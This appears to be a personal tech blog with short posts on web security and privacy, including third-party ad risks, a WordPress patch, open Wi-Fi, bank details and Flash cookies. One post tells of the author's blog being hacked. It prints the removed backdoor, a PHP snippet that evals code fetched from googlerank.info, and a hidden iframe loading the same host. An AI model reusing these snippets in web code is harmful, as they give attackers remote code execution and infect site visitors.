Order of the Bath

When we build web sites we don’t necessarily create all the content ourselves. For various reasons we might subcontract out parts of it to third parties. Some examples are banner advertising and external widgets such as page counters and other statistics. In each case the code we insert on behalf of the third party pulls in content from their web servers and we have little control over it.

Now you might imagine that the big advertising company that you are signed up with have their reputation to consider and would only serve you good banners but it is not as simple as that. They sell on advertising space (syndicate) to other companies. The person visiting your site may be in another country; the code can tell that and will adjust the response accordingly; that is called geo-targeting. Now the agency doesn’t necessarily have material for that country so they contract out to yet another company to do it for them. This can happen many times before the advert is delivered, sometimes on a geographical basis, sometimes on a share arrangement—all without you knowing anything about it. You trusted the original supplier, and they trusted their subcontractor but it is getting a bit thin by the time the eventual supplier is reached and it is not uncommon for that one to be sending a virus or spy-ware to your customer. Yes, they are still your customer and will hold you responsible for what happens.

The other example I suggested was page counters, they are useless but small site owners still seem to like them. There used to be hundreds of different ones around but I haven’t looked recently. Some of these go out of business or get bought out without you knowing. The web address may have lapsed and been snapped up by someone else. This new owner could be using it for anything—including sending mal-ware to your visitors. When was the last time you looked at that page counter? Is it still doing what you though it was?

There are two good, but rather technical, reports linked to from this Google Blog that you should read if you think you may be affected by this.

This came out yesterday as an emergency patch for a vulnerability. I wouldn’t normally write about it here but, for some reason, they didn’t publish the list of changed files. So here they are:—

xmlrpc.php
wp-content\plugins\akismet.php
wp-admin\install-helper.php
wp-includes\version.php
wp-includes\gettext.php
wp-includes\pluggable.php

It is the first one that is important.

This is more of a problem in an area with a lot of holiday homes but The St. Ivean points out that you only have to look for the houses with a Yellow Pages standing by the front door to find one where you won’t be disturbed breaking in.

For longer than I can remember, I have carried a Donor Card in my wallet—I have just looked and mine is dated 17 Apr 1986. They were easy to get and quite high profile; on the counter in doctor’s surgeries, dentist’s, blood donor sessions, even non medical places like pubs, newsagents etc. sometimes had them.

Today they are saying that there are nowhere near enough donors and perhaps we should change over to an opt-out system where permission to donate is assumed unless you have made a declaration that you do not want to. I don’t disagree with the idea but in passing I picked up another clue—the NHS Organ Donor Register. I had never heard of it! Is it now true that it is no longer good enough to carry a card but you have to be signed up to some online database? I don’t think I like that idea*. Perhaps that is why the number of available donors is so low.

* I have had a look at the registration web site and, despite the announcement that it uses Digi-Sign and so is secure, that is an illusion. The information required is Name, DOB and Address. This is fairly public information; anyone could fill this in. DOB is a bit harder to obtain, but is not fully private.

There is a big debate going on at the moment prompted by an article by Bruce Schneier in which he explains why he leaves his home Wi-Fi network unsecured i.e. no password, no encryption. He discusses the risks and benefits and comes to the conclusion that, for him, the latter outweigh the former. Note that he is not saying it is for everyone.

The key points in the debate centre around

• How much you trust your neighbours not to flood your bandwidth.
• The terms of service from your ISP, if you are bothered about that.
• The responsibility you have for what travels over your link—e.g. illegal/unsavoury material.
• Reducing your protection from hackers—this is why it is not for everyone.

I still don’t know which way to turn—which means I secure it for the time being.

I didn’t see it at the time, but apparently Jeremy Clarkson published his own bank account details in a newspaper article to demonstrate that the loss of the Benefits database was not a big deal. Now he finds that someone has diverted £500 of his money to charity.

In principle, I think he was right, but I wouldn’t have done it. If any money is removed from your account without your permission it is the bank’s fault unless (maybe) you were negligent. The account number and sort codes, your name and address are not secret information. You require more information that that to withdraw or transfer money, but a lot of bank transactions still rely on unreliable signatures and I wouldn’t trust their diligence to check all that carefully.

They say that “The bank cannot find out who did this because of the Data Protection Act and they cannot stop it from happening again.” That is utter rubbish They may not be able to find out who because they probably don’t know who, if it was done by a forged signature, but any clues they do have are criminal evidence and not subject to data protection from the relevant authorities. I think they perhaps mean that they can’t tell Jeremy. I suspect that in this case, he will not be pressing for an investigation, but normally you should.

The flaw seems to be that some Direct Debit forms do not require a signature and the banks allow this. That is not banking, that is a welfare agency and they should be liable. I have never trusted the Direct Debit system, but I hadn’t realised that it was that bad.

It would have been even funnier if the donation was made to Friends of the Earth

In the office today we had a spate of the Google “We’re Sorry” screen. We have no idea why but it was coming up on quite innocent single word searches. I had a search around and found a few pages of explanation but I think they have made a few mistakes with the error page. First of all, it doesn’t look like a Google page—the font for the logo is wrong—all the Google error pages are like this. Secondly, it is directing you to a less than perfect source of anti-virus and anti-spyware software. Although it is C|Net, there are some very dodgy downloads in there. But most of all, there is no clearly explained reason why the message appears. Admittedly it is better than earlier versions when it told you point-blank that you were infected but a list of possible reasons would be useful.

When it comes to the Captcha needed to continue working, I can’t read many of them.

This has gone into RC3 - i.e. the last patching before production release. More about it at MajorGeeks but beware this is still an unofficial release and may (will) contain bugs. I would expect the final release in January. This will be good news for anyone with a slightly flaky system or who is planning a rebuild. Having all the updates together in one place makes it so much easier and guarantees that you haven’t missed one.

Some time recently (at least I hope it was recently) someone has hacked this blog. It was very subtle and I only discovered when a friend said that she could no longer get to even my home page. She uses McAfee security system and got the message

googlerank.info/counter may cause a breach of browser security.

*Why were you redirected to this page?* When we tested, this site attempted to make unauthorized changes to our test PC by exploiting a browser security vulnerability. This is a serious security threat which could lead to an infection of your PC.

The McAfee information page had more details. I had a hunt around and couldn’t see any mention of this googlerank.info site and no iframes and was beginning to think it was a false alarm. But looking at the page source of the front blog page via the view menu in Firefox, I spotted a small line of code apparently advertising a DVD download site. I can’t show it to you now because I forgot to save a copy but it was rather odd. It was designed not to display (using CSS) so must have been there only for the search engine linking credit; also, it made no mention of the googlerank.info site. It was just before the footer code and didn’t appear on any other blog pages so I was drawn to my theme index.php page and, sure enough, between <?php get_sidebar(); ?> and <?php get_footer(); ?> was the offending line of code. Checking over the rest of the file I found another piece immediately after the initial <?php which did mention the offending googlerank.info stuff which was as follows:—

if (isset($_COOKIE['pird']) or isset($_GET['pird'])) {
if (!isset($_COOKIE['pird'])) setcookie(’pird’, ‘12313.412′,time()+60*60*24*600);
eval(gzuncompress(file_get_contents(’http://googlerank.info/soft/faq.compressed’)));
exit;
}

I am not exactly sure what it does, the file referenced seems to be missing, but I have chopped the code out now. A Google search doesn’t come with any hits for this type of hack.

What is worrying is that I don’t know how they got in. I had a good admin password which I have now changed for an even better one. I should also refresh the theme code from source in case there are other changes that I haven’t seen. I will need to look seriously at updating to the latest WordPress version, or perhaps the problem is file permissions? Or is my hosting service compromised? Also, do I need to tell some database somewhere that I am safe again, McAfee seems to have already white-listed me? I can see that there is no point in these security companies telling deliberately malicious sites that they are blacklisted but it would be useful for those of us who have been unknowingly hacked.

As a result I have a lot more respect for McAfee than I did before, I see they also know that the site is hosted in Canada.

Update: Looking around I found that the main site index.htm was also modified. It had the well known line

<iframe src=http://googlerank.info/counter style=display:none></iframe>

so this is probably what McAfee was seeing. What I still don’t know is how it was done. None of the file or directory protections are bad and the date on the files attacked is the same as the original. I have now refreshed everything so it should be clean but if you don’t know how then it remains a concern.

Update 2: Mtekk’s Crib seems to have found a similar problem.

Update 3: Creative Briefing has experienced a similar problem using WordPress version 2.3.3 (the current one at 13-Mar-2008). This is very worrying.

These little things are a well kept secret of the browser world. You all know about Cookies? No, well I’ll first explain about them…Cookies are small pieces of data that are stored by your browser on behalf of the sites that you visit.

The problem discovered in the early days of web browsing is that it is a stateless process. Each request for data on a page is independent of every other. Although you know that your request for page 2 is related to your just having read page 1, the server at the other end sees it as an isolated call. If you are following a sequence, such as a process to purchase a book from Amazon, the server needs to know that the pages are all part of the same transaction. It does this by creating a cookie at your end which contains a unique identifier. This is sent along with each subsequent request so that the server can relate them all together without losing track.

There are two sorts of cookie—transient ones which are deleted as soon as the process is completed and longer term dated ones which carry forward information from one browser session to another. There is some security included which only allows a server to read the cookies that it created; this is done by domain name. A good example of a long term cookie is the one that holds your preferences for Google searches so it remembers which languages you prefer etc.

One use for cookies that have gained them a bad reputation is for advertising. The ad-server will store information about what ads it had sent you so it could ensure that you get different ones next time and perhaps also which ones you have clicked on so it can give you more of the same. These became known as tracking cookies, but it is not really as bad as it sounds; the security is still there and the only information that could be called personal is your network address. There is no suggestion that email addresses, personal names or other such things were disclosed, but by looking at the cookies on a user’s system you could get some idea of what sites they have been browsing. For more information see the Wikipedia article.

Due to their reputation, there is now a problem for companies that need to use them; up to 40% of people delete cookies on a regular basis. There is a built in feature in Firefox (and perhaps IE) to delete all cookies now or every time you shut down. As a result many advertising programs were not working properly.

Enter Macromedia (now Adobe) Flash. This system which operates on top of the standard web protocol is widely used by advertisers (and often disliked by users) because it allows animation and sound. It is also used by sites like YouTube to display short videos on demand and web designers to create really fancy (flashy!) sites. Flash has the capability to read and write cookies but it is cumbersome so they created their own (called Local Shared Objects). This was a good idea when they were used for the same purpose that cookes were designed for. But they are now being used as a backup to standard cookies because most people don’t know about them. If some sites spot that their standard cookie has been deleted, they will read the flash backup copy and immediately recreate the cookie, subverting the intention of the user.

Firefox extensions to the rescue—Objection. It is not very clever but does allow you to see the LSOs that have been created and delete them if needed. I am not suggesting that you get paranoid and delete everything in sight but you deserve to have control over your own browsing experience. Of course you could chose to block Flash altogether! I find animations distracting.